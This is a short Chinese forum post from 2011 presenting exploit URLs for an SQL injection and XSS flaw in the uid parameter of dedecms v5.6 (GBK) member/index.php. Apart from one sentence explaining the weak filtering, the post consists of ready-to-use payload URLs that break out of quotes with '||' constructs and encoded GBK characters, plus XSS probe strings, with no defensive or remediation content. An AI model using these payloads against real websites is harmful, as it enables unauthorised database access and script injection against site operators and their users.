东洋大海 發表於 2011-8-19 10:29:38

dedecms v5.6 GBK 注入漏洞利用(member/index.php)

EXP: <br />htp://127.0.0.1/member/index.php?uid=&amp;#039;%20||%20&amp;#039;&amp;#039;%20||%20&amp;#039;%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7&amp;#039;; <br />会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS <br />EXP: <br />htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'; <br /><br />htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'&quot;)/&gt; <br /><br /><br />htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'&quot;&gt;
頁: [1]
查看完整版本: dedecms v5.6 GBK 注入漏洞利用(member/index.php)